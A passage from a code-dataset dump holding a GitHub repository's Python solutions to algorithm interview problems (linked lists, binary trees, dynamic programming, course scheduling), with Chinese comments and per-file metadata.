fptr.close()\n"
}
] | 2 |
melo4/jianzhioffer | https://github.com/melo4/jianzhioffer | 7b50a741a6c8ec08a676410d1fc7ec5c21043f10 | 4f139f578f4c6c6d402886cfca4c0d8adb856f1f | 35c79ef552b90434fb9d3a6cccb3ed7851fcb61a | refs/heads/master | 2020-04-29T15:34:05.750162 | 2019-09-30T09:43:33 | 2019-09-30T09:43:33 | 176,232,506 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4532374143600464,
"alphanum_fraction": 0.49880096316337585,
"avg_line_length": 18.85714340209961,
"blob_id": "5620b0cdcac714cf6a12ae082ea8ebeb4894a27e",
"content_id": "3072cbf77fcf17871a958e83033b8c66c1d46338",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 417,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 21,
"path": "/求组合数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/9/14 21:42\n# @Author : Meng Xiao\ndef get_value(n):\n if n == 1:\n return n\n else:\n return n * get_value(n - 1)\n\n\ndef gen_last_value(n, m):\n first = get_value(n)\n second = get_value(m)\n third = get_value((n - m))\n return first // (second * third)\n\n\nif __name__ == \"__main__\":\n # C(12,5)\n rest = gen_last_value(5, 1)\n print(\"value:\", rest)\n"
},
{
"alpha_fraction": 0.47648516297340393,
"alphanum_fraction": 0.4987623691558838,
"avg_line_length": 27.89285659790039,
"blob_id": "d42d646ce87b07136c7584106547cc91b7035b0b",
"content_id": "30ba2dc90217b6d1142a1ea52334ecbaadb37923",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 902,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 28,
"path": "/最长不含重复字符的子字符串.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/15 下午9:33\n# @Author : Meng Xiao\nclass Solution:\n '''\n 动态规划,f(i):以第i个字符结尾的字符串包含不包含重复字符的子串长度\n '''\n def longestSub(self, s):\n if not s:\n return\n curLength = 0\n maxLength = 0\n position = [-1] * 26 #用于标示每个字符上次出现的位置\n for i in range(len(s)):\n preIndex = position[ord(s[i])-ord('a')]\n if preIndex < 0 or i - preIndex > curLength:\n curLength += 1\n else:\n if curLength > maxLength:\n maxLength = curLength\n curLength = i - preIndex\n position[ord(s[i])-ord('a')] = i\n # if curLength > maxLength:\n # maxLength = curLength\n return maxLength\n\ns = Solution()\nprint(s.longestSub('arabcacfr'))"
},
{
"alpha_fraction": 0.4295977056026459,
"alphanum_fraction": 0.5416666865348816,
"avg_line_length": 28,
"blob_id": "11fb4c821cd38b6c702e0070b8c6679d30a73c32",
"content_id": "8acf87e8a94cc1021f5894925b5b970a8e8ea674",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 946,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 24,
"path": "/神奇数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/31 15:27\n# @Author : Meng Xiao\n'''\n给出一个区间[a, b],计算区间内“神奇数”的个数。\n神奇数的定义:存在不同位置的两个数位,组成一个两位数(且不含前导0),且这个两位数为质数。\n比如:153,可以使用数字3和数字1组成13,13是质数,满足神奇数。同样153可以找到31和53也为质数,只要找到一个质数即满足神奇数。\n'''\nimport itertools\na, b = map(int, input().split())\nzs = [11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]\n# 所有两位的质数\nnum = 0\nfor i in range(a, b+1):\n tt = list(str(i))\n for item in itertools.combinations(tt, 2):\n tep = [int(''.join(item)), int(''.join(item[::-1]))]\n for j in tep:\n if j in zs and j >= 10:\n num += 1\n break\n else:\n continue\nprint(num)\n"
},
{
"alpha_fraction": 0.5299891233444214,
"alphanum_fraction": 0.5517993569374084,
"avg_line_length": 24.47222137451172,
"blob_id": "f347cf6dae6f5c49aba8e768d8ec574edd7d2646",
"content_id": "b2f60a2bd6567da52683c9eaf5de3272a9cfc2e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 961,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 36,
"path": "/二叉树中和为某一值的路径.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/11 下午3:27\n# @Author : Meng Xiao\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n # 返回二维列表,内部每个列表表示找到的路径\n def FindPath(self, root, expectNum):\n if not root or root.val > expectNum:\n return []\n if not root.left and not root.right and root.val == expectNum:\n return [[root.val]]\n else:\n expectNum -= root.val\n left = self.FindPath(root.left, expectNum)\n right = self.FindPath(root.right, expectNum)\n\n result = [[root.val]+i for i in left]\n for i in right:\n result.append([root.val]+i)\n\n return result\na = TreeNode(10)\nb = TreeNode(5)\nc = TreeNode(12)\nd = TreeNode(4)\ne = TreeNode(7)\na.left = b\na.right = c\nb.left = d\nb.right = e\ns = Solution()\nprint(s.FindPath(a, 22))\n"
},
{
"alpha_fraction": 0.32447296380996704,
"alphanum_fraction": 0.36892759799957275,
"avg_line_length": 28.486486434936523,
"blob_id": "fa36f8b258b08693d222cc3ade1d3de05e509f04",
"content_id": "96ce42c8d37628fb8b045574184dd86d7bf47cfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2212,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 74,
"path": "/LCS最长公共子序列.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/22 下午4:12\n# @Author : Meng Xiao\nclass Solution:\n def maxSubSequence(self, s1, s2):\n if not s1 or not s2:\n return\n if len(s1) == 0 or len(s2) == 0:\n return 0\n flag = 0\n dp = [[0 for j in range(len(s2)+1)] for i in range(len(s1)+1)]\n for i in range(1, len(s1)+1):\n for j in range(1, len(s2)+1):\n if s1[i-1] == s2[j-1]:\n dp[i][j] = dp[i-1][j-1] + 1\n else:\n dp[i][j] = max(dp[i-1][j], dp[i][j-1])\n i, j = len(s1), len(s2)\n while i >= 1 and j >= 1:\n if s1[i-1] == s2[j-1]:\n print(s1[i-1])\n i -= 1\n j -= 1\n else:\n if dp[i][j-1] > dp[i-1][j]:\n j -= 1\n else:\n i -= 1\n\n return dp[-1][-1]\n\n # 最长公共子串\n def maxSubStr(self, s1, s2):\n if not s1 or not s2:\n return\n len1 = len(s1)\n len2 = len(s2)\n dp = [[0 for j in range(len2)] for i in range(len1)]\n maxLength = 0\n for i in range(len1):\n for j in range(len2):\n if s1[i] == s2[j]:\n if i == 0 or j == 0:\n dp[i][j] = 1\n else:\n dp[i][j] = dp[i-1][j-1] + 1\n if dp[i][j] > maxLength:\n maxLength = dp[i][j]\n start_index = i - dp[i][j] + 1\n print(s1[start_index:start_index+maxLength])\n return maxLength\n\n # 最长上升子序列\n def maxIncrease(self, arr):\n if not arr:\n return \n maxLen = 0\n n = len(arr)\n dp = [1] * n\n for i in range(n):\n for j in range(i):\n if arr[j] < arr[i]:\n dp[i] = max(dp[j]+1, dp[i])\n maxLen = max(dp)\n res = []\n for i in range(n-1, -1, -1):\n if dp[i] == maxLen:\n res.append(arr[i])\n maxLen -= 1\n print(res[::-1])\n return max(dp)\n\ns = Solution()\nprint(s.maxIncrease([1,5,2,6,7,3]))\n"
},
{
"alpha_fraction": 0.27542373538017273,
"alphanum_fraction": 0.3262711763381958,
"avg_line_length": 25.27777862548828,
"blob_id": "1163747b29babe291a6a25cc9b57d80965fb36d2",
"content_id": "c2dc931f589706117772de98b6c487a6b993dd4c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 472,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 18,
"path": "/十进制转任意进制.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/9/21 20:30\n# @Author : Meng Xiao\ndef func2(n, x):\n a = ['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n b = []\n while True:\n s = n // x\n y = n % x\n b = b + [y]\n if s == 0:\n break\n n = s\n b.reverse()\n res = []\n for i in b:\n res.append(a[i])\n return ''.join(res)"
},
{
"alpha_fraction": 0.3937729001045227,
"alphanum_fraction": 0.4432234466075897,
"avg_line_length": 29.27777862548828,
"blob_id": "9019f43879dbf819772e2ce966fd66e926aacdca",
"content_id": "1596754f2cbab3dd8b4b2a5b2225e4bc3ea89768",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 546,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 18,
"path": "/leetcode-892三维形体表面积.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/26 10:30\n# @Author : Meng Xiao\n\nclass Solution:\n def surfaceArea(self, grid):\n s = sum(sum([4*i+2 for i in m if i != 0]) for m in grid)\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if j != len(grid[0]) - 1:\n s -= min(grid[i][j], grid[i][j+1]) * 2\n if i != len(grid) - 1:\n s -= min(grid[i][j], grid[i+1][j]) * 2\n return s\n\ns = Solution()\ngrid = [[1,2],[3,4]]\nprint(s.surfaceArea(grid))\n\n"
},
{
"alpha_fraction": 0.4824742376804352,
"alphanum_fraction": 0.4845360815525055,
"avg_line_length": 23.897436141967773,
"blob_id": "a7edc96f19fbf7bea840d3dd0154b944966cd947",
"content_id": "f12c7832d70a551763b08206ff02ebacec0fcd4c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 970,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 39,
"path": "/111.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "class TrieNode:\n def __init__(self):\n self.is_word = False\n self.data = {}\n\nclass Trie:\n def __init__(self):\n self.root = TrieNode()\n def insert(self, word):\n node = self.root\n for letter in word:\n child = node.data.get(letter)\n if not child:\n node.data[letter] = TrieNode()\n node = node.data[letter]\n node.is_word = True\n def search(self, word):\n cur = ''\n ans = []\n node = self.root\n for letter in word:\n node = node.data.get(letter)\n cur += letter\n if not node:\n return ans\n if (node.is_word == True):\n ans.append(cur)\n return ans\n\ntrie = Trie()\ns = \"abcdefg\"\nd = ['ab','abc','abcd','bcd','bcde','bde','efg']\nfor x in d:\n trie.insert(x)\nprint(trie.root.data)\nfor i in range(0,len(s)):\n lst = trie.search(s[i:])\n if(len(lst)!=0):\n print(lst)"
},
{
"alpha_fraction": 0.47746968269348145,
"alphanum_fraction": 0.4878682792186737,
"avg_line_length": 23.04166603088379,
"blob_id": "0b93063aa46030a4039fe2eab673b1e550d2feba",
"content_id": "5150e8b04c9f3b7b8b8335d13fd9d0e4f6950264",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1154,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 48,
"path": "/leetcode-143重排链表.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/7/26 10:53\n# @Author : Meng Xiao\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def reorderList(self, head):\n \"\"\"\n Do not return anything, modify head in-place instead.\n \"\"\"\n if not head or not head.next:\n return head\n mid = head\n right = head.next\n while right.next and right.next.next:\n mid = mid.next\n right = right.next.next\n right = mid.next\n mid.next = None\n\n right = self.reverseList(right)\n\n cur = head\n while cur.next:\n tmp = cur.next\n cur.next = right\n right = right.next\n cur.next.next = tmp\n cur = tmp\n cur.next = right\n\n return head\n\n def reverseList(self, head):\n if not head or not head.next:\n return head\n prev = None\n cur = head\n while cur:\n nxt = cur.next\n cur.next = prev\n prev = cur\n cur = nxt\n return prev\n"
},
{
"alpha_fraction": 0.41726619005203247,
"alphanum_fraction": 0.46882495284080505,
"avg_line_length": 29.851852416992188,
"blob_id": "05aeee5bcd8d3a1e511dda2acd0c62f0d074226a",
"content_id": "cfe7c850f0dc8cc2b3b3406b723a023afd53f614",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 868,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 27,
"path": "/把数字翻译成字符串.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/15 下午7:34\n# @Author : Meng Xiao\nclass Solution:\n def getTranslationCount(self, num):\n if not isinstance(num, int) or num < 0:\n return\n str_num= str(num)\n length = len(str_num)\n counts = [0] * length # 表示从第i位开始的不同翻译的数目\n\n for i in range(length-1, -1, -1):\n if i == length - 1:\n counts[i] = 1\n continue\n\n count = counts[i+1]\n value = (ord(str_num[i]) - ord('0')) * 10 + (ord(str_num[i+1]) - ord('0'))\n if i == length - 2:\n count += 1 if 10 <= value <= 25 else 0\n else:\n count += counts[i+2] if 10 <= value <= 25 else 0\n counts[i] = count\n return counts[0]\n\ns = Solution()\nprint(s.getTranslationCount(12258))\n\n"
},
{
"alpha_fraction": 0.3853503167629242,
"alphanum_fraction": 0.4554140269756317,
"avg_line_length": 23.153846740722656,
"blob_id": "94d7a1334fffcf670fc0454ec97d8cc59ee605a5",
"content_id": "3f2db83285f46f4d95dd615b4d060b32e6481c7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 314,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 13,
"path": "/整数反转.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "\n# -*- coding: utf-8 -*-\n# @Time : 2019/5/7 20:54\n# @Author : Meng Xiao\nclass Solution(object):\n def reverse(self, x):\n\n if x < 0:\n return -self.reverse(-x)\n res = 0\n while x:\n res = res * 10 + x % 10\n x /= 10\n return res if res <= 0x7fffffff else 0"
},
{
"alpha_fraction": 0.39080458879470825,
"alphanum_fraction": 0.5114942789077759,
"avg_line_length": 28,
"blob_id": "20394a852ed20139e639dba238fcbb039e194a85",
"content_id": "644f2ba3b0581927de416e3ebf3a6547ab0973fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 352,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 12,
"path": "/不用加减乘除做加法.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": " # -*- coding: utf-8 -*-\n# @Time : 2019/4/18 下午10:00\n# @Author : Meng Xiao\nclass Solution:\n def Add(self, num1, num2):\n while num2 != 0:\n temp = num1 ^ num2\n num2 = (num1 & num2) << 1\n num1 = temp & 0xffffffff\n return num1 if num1 >> 31 == 0 else num1 - 4294967296\ns = Solution()\nprint(s.Add(5,3))"
},
{
"alpha_fraction": 0.47647058963775635,
"alphanum_fraction": 0.5235294103622437,
"avg_line_length": 31.730770111083984,
"blob_id": "10517486b6fdad3a448970d4fdbde6196caadb4e",
"content_id": "bf22bc780e7d9e99d207b8de01ec1510d92fd0d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 854,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 26,
"path": "/丑数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/5 下午3:37\n# @Author : Meng Xiao\nclass Solution:\n def GetUglyNumber(self, index):\n if not index:\n return 0\n ugly_number = [1] * index\n next_index = 1\n index2 = 0\n index3 = 0\n index5 = 0\n while next_index < index:\n minValue = min(ugly_number[index2]*2, ugly_number[index3]*3, ugly_number[index5]*5)\n ugly_number[next_index] = minValue\n\n while ugly_number[index2] * 2 <= ugly_number[next_index]:\n index2 += 1\n while ugly_number[index3] * 3 <= ugly_number[next_index]:\n index3 += 1\n while ugly_number[index5] * 5 <= ugly_number[next_index]:\n index5 += 1\n next_index += 1\n return ugly_number\ns = Solution()\nprint(s.GetUglyNumber(10))"
},
{
"alpha_fraction": 0.3391304314136505,
"alphanum_fraction": 0.44130435585975647,
"avg_line_length": 22.049999237060547,
"blob_id": "ab71d002024db19dcb29a6313938158d39a2d2ab",
"content_id": "54995cc4fa0d8b9fa2287aa8a1955fd0955d8b44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 464,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 20,
"path": "/二维数组中的查找.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/18 下午4:11\n# @Author : Meng Xiao\ndef findE(list2d, x):\n if list2d == []:\n return False\n m = len(list2d)\n n = len(list2d[1])\n i = 0\n j = n-1\n while i < m and j >=0:\n if x == list2d[i][j]:\n return True\n if x < list2d[i][j]:\n j -= 1\n else:\n i += 1\n return False\nlist2d = [[1,2,8,9],[2,4,9,12],[4,7,10,13],[6,8,11,15]]\nprint(findE(list2d,5))"
},
{
"alpha_fraction": 0.43123939633369446,
"alphanum_fraction": 0.47028863430023193,
"avg_line_length": 25.81818199157715,
"blob_id": "07854d8f11a23964fccc8ccda25e8cdc7f0f746b",
"content_id": "5938ff965c8adf40221586f4bb276967e57bf509",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 593,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 22,
"path": "/数组中数值和下标相等的元素.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/16 下午10:20\n# @Author : Meng Xiao\nclass Solution:\n def GetNUmberSameAsIndex(self, numbers):\n length = len(numbers)\n if not numbers or length <= 0:\n return\n left = 0\n right = length - 1\n while left <= right:\n mid = (left + right) // 2\n if numbers[mid] == mid:\n return mid\n if numbers[mid] > mid:\n right = mid - 1\n else:\n left = mid + 1\n\n return\ns = Solution()\nprint(s.GetNUmberSameAsIndex([-3,-1,1,3,5]))"
},
{
"alpha_fraction": 0.5544827580451965,
"alphanum_fraction": 0.5786206722259521,
"avg_line_length": 20.984848022460938,
"blob_id": "699d120c48a43727b5cf043080e02a7363c4c00b",
"content_id": "8aa7779b0ef0fe9439444648b6d4530788b36a26",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1746,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 66,
"path": "/m-n之间链表反转.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/6/4 20:17\n# @Author : Meng Xiao\n'''\n给定一个链表,翻转该链表从m到n的位置。要求直接翻转而非申请新空间。\n如:给定1→2→3→4→5,m=2,n=4,返回1→4→3→2→5。\n假定给出的参数满足:1≤m≤n≤链表长度。\n'''\n\nclass ListNode:\n val = None\n next = None\n\n# 创建带头结点的链表\ndef createLinkList(linklist_str):\n if len(linklist_str) <= 0:\n return None\n linkList = ListNode()\n pNode = linkList\n # 尾插法\n for x in linklist_str:\n node = ListNode()\n node.val = x\n pNode.next = node\n pNode = pNode.next\n return linkList\n\n# 打印链表\ndef printLinkList(linklist):\n if linklist == None:\n print('None')\n return\n s = ''\n node = linklist.next\n while node != None:\n s = s + str(node.val)\n node = node.next\n print(s)\n\n# 翻转链表从m到n位置\ndef reverseLinkList(linklist, m, n):\n '''\n 先找到第m个元素, 然后把链表中的第n个元素添加到它前面,重复执行n-m次\n '''\n # 找到第m个节点的前个节点\n preMNode = linklist\n for i in range(m-1):\n preMNode = preMNode.next\n\n for i in range(n-m):\n preNNode = linklist\n # 找到第n个节点的前节点\n for j in range(n-1):\n preNNode = preNNode.next\n nNode = preNNode.next #第n个节点\n preNNode.next = preNNode.next.next\n nNode.next = preMNode.next\n preMNode.next = nNode\n preMNode = preMNode.next\n printLinkList(linklist)\n\nif __name__ == '__main__':\n s = '123456'\n linklist = createLinkList(s)\n printLinkList(linklist)\n reverseLinkList(linklist,2,5)"
},
{
"alpha_fraction": 0.46136102080345154,
"alphanum_fraction": 0.4913494884967804,
"avg_line_length": 25.24242401123047,
"blob_id": "9e5d964c011eaffb97f91a67e54b6c38e2006223",
"content_id": "b04e58c4cbb84c7c4ccabd02289e53b4bb872b22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 871,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 33,
"path": "/快排思想找中位数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/23 下午5:28\n# @Author : Meng Xiao\n\nclass Solution:\n\n def midNumber(self, alist, left, right):\n if left >= right:\n return alist[left]\n key = alist[left]\n low = left\n high = right\n mid = (len(alist) - 1) // 2\n while left < right:\n while left < right and alist[right] >= key:\n right -= 1\n alist[left] = alist[right]\n while left < right and alist[left] <= key:\n left += 1\n alist[right] = alist[left]\n alist[right] = key\n if right == mid:\n\n return key\n elif right < mid:\n\n return self.midNumber(alist, left+1, high)\n else:\n return self.midNumber(alist, low, left-1)\n\ns = Solution()\noutput = s.midNumber([1,1,1,3,5,4,6], 0, 6)\nprint(output)\n\n"
},
{
"alpha_fraction": 0.37457627058029175,
"alphanum_fraction": 0.4372881352901459,
"avg_line_length": 35.9375,
"blob_id": "dbca534ddc444f70b701f595a762e879f42549a8",
"content_id": "473e2938a04a515a4a95ced3a2173a964c40eb34",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 590,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 16,
"path": "/leetcode-43字符串相乘.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/6/26 19:59\n# @Author : Meng Xiao\nclass Solution:\n def multiply(self, num1: str, num2: str) -> str:\n if num1 == '0' or num2 == '0':\n return '0'\n res = [0] * (len(num1) + len(num2))\n for i, n1 in enumerate(reversed(num1)):\n for j, n2 in enumerate(reversed(num2)):\n res[i + j] += int(n1) * int(n2)\n res[i + j + 1] += res[i + j] // 10\n res[i + j] %= 10\n while len(res) > 1 and res[-1] == 0:\n res.pop()\n return ''.join(map(str, res[::-1]))"
},
{
"alpha_fraction": 0.5681592226028442,
"alphanum_fraction": 0.5870646834373474,
"avg_line_length": 20.869565963745117,
"blob_id": "7cf0f4125c4e3870b7ffa0e5285b889f04a3e2c8",
"content_id": "fff6d1c962b5f1e01ccf3bf836b123337b6410b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1009,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 46,
"path": "/二叉树的镜像.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/9 下午2:52\n# @Author : Meng Xiao\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n def mirrorRecursively(self, pRoot):\n if pRoot is None:\n return\n if pRoot.left is None and pRoot.right is None:\n return pRoot\n pTemp = pRoot.left\n pRoot.left = pRoot.right\n pRoot.right = pTemp\n\n self.mirrorRecursively(pRoot.left)\n self.mirrorRecursively(pRoot.right)\n return pRoot\n\n def printTree(self, pRoot):\n if pRoot is None:\n return\n print(pRoot.val)\n self.printTree(pRoot.left)\n self.printTree(pRoot.right)\na = TreeNode(8)\nb = TreeNode(6)\nc = TreeNode(10)\nd = TreeNode(5)\ne = TreeNode(7)\nf = TreeNode(9)\ng = TreeNode(11)\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.left = f\nc.right = g\n\ns = Solution()\nprint(s.printTree(a))\ns.mirrorRecursively(a)\nprint(s.printTree(a))"
},
{
"alpha_fraction": 0.4510703384876251,
"alphanum_fraction": 0.4816513657569885,
"avg_line_length": 26.25,
"blob_id": "94bb3af9a1e4af9cd0c117c638917591906f4ff8",
"content_id": "ee6a7930f155a38bfb95d599cebdfa4db0ee444c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 658,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 24,
"path": "/数值的整数次方.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/30 下午3:10\n# @Author : Meng Xiao\nclass Solution:\n def Power(self, base, exponent):\n try:\n ret = self.power_value(base, abs(exponent))\n if exponent < 0:\n ret = 1.0 / ret\n except ZeroDivisionError:\n print('Error: base is zero')\n else:\n return ret\n\n def power_value(self, base, exponent):\n if exponent == 0:\n return 1\n if exponent == 1:\n return base\n ret = self.power_value(base, exponent >> 1)\n ret *= ret\n if exponent & 1 == 1:\n ret *= base\n return ret\n"
},
{
"alpha_fraction": 0.4600326120853424,
"alphanum_fraction": 0.4796084761619568,
"avg_line_length": 24.54166603088379,
"blob_id": "39a3369e6852a9837cc0f1e14bda28f5100aa5f3",
"content_id": "a76d8bbb581ac592e245798d0492957c3f3c690e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 617,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 24,
"path": "/链表中倒数第k个节点.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/2 下午4:20\n# @Author : Meng Xiao\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def FindKthToTail(self, head, k):\n if head == None or k <= 0:\n return None\n pAhead = head\n pBhead = None\n for i in range(k-1):\n if pAhead.next != None:\n pAhead = pAhead.next\n else:\n return None\n pBhead = head\n while pAhead.next != None:\n pAhead = pAhead.next\n pBhead = pBhead.next\n return pBhead\n"
},
{
"alpha_fraction": 0.5215053558349609,
"alphanum_fraction": 0.5573476552963257,
"avg_line_length": 26.950000762939453,
"blob_id": "28e1b6a61ace405e41f763d855ae41b6de3ea6d9",
"content_id": "eb550b5e042aeb9ecaab226990c1fa752c2f1b5e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 730,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 20,
"path": "/leetcode-14 最长公共前缀.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/5/14 22:02\n# @Author : Meng Xiao\n\nclass Solution(object):\n '''\n 首先 ,最长公共前缀,长度不可能大于strs[0],只要strs中存在比当前长度i更短的string,\n 立刻返回上一轮LCP,即strs[0][:i]\n只要strs中存在当前index字符与LCP该index不相同的字符串,立刻返回上一轮LCP,即strs[0][:i]\n如果一直没返回,说明strs[0]本身就是LCP,返回它\n '''\n def longestCommonPrefix(self, strs):\n\n if not strs:\n return ''\n for i in range(len(strs[0])):\n for str in strs:\n if len(str) <= i or strs[0][i] != str[i]:\n return strs[0][:i]\n return strs[0]"
},
{
"alpha_fraction": 0.4736842215061188,
"alphanum_fraction": 0.4894736707210541,
"avg_line_length": 29.3799991607666,
"blob_id": "96713658248b1a7cffbe2d4fc6feb047f27ad5fe",
"content_id": "29e360ef3ac6f6e1e818f11832d4afddac363da9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1566,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 50,
"path": "/leetcode-207课程表.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/21 下午11:59\n# @Author : Meng Xiao\n\n#左边依赖右边\nclass Solution:\n def canFinish(self, numCourses, prerequisites):\n indegrees = [0 for _ in range(numCourses)] # 入度\n adjacency = [[] for _ in range(numCourses)] # 邻接表\n queue = []\n for cur, pre in prerequisites:\n indegrees[cur] += 1\n adjacency[pre].append(cur)\n # 取出入度为0的课程\n for i in range(len(indegrees)):\n if not indegrees[i]:\n queue.append(i)\n # BFS\n while queue:\n pre = queue.pop(0)\n numCourses -= 1\n for cur in adjacency[pre]:\n indegrees[cur] -= 1\n if not indegrees[cur]:\n queue.append(cur)\n return not numCourses\n\n\n # dfs做法\n def canFinish1(self, numCourses, prerequisites):\n def dfs(i, adjacency, flags):\n if flags[i] == -1:\n return True\n if flags[i] == 1:\n return False\n flags[i] = 1\n for j in adjacency[i]:\n if not dfs(j, adjacency, flags):\n return False\n flags[i] = -1\n return True\n\n flags = [0 for _ in range(numCourses)]\n adjacency = [[] for _ in range(numCourses)]\n for cur, pre in prerequisites:\n adjacency[pre].append(cur)\n for i in range(numCourses):\n if not dfs(i, adjacency, flags):\n return False\n return True\n\n"
},
{
"alpha_fraction": 0.4366319477558136,
"alphanum_fraction": 0.4939236044883728,
"avg_line_length": 18.21666717529297,
"blob_id": "afabdda95123571d4a1282ab87af46115ade2714",
"content_id": "e49a45775e362f3be4b0dc2a239df1a1f291d3dd",
"detected_licenses": [],
"is_generated": false,
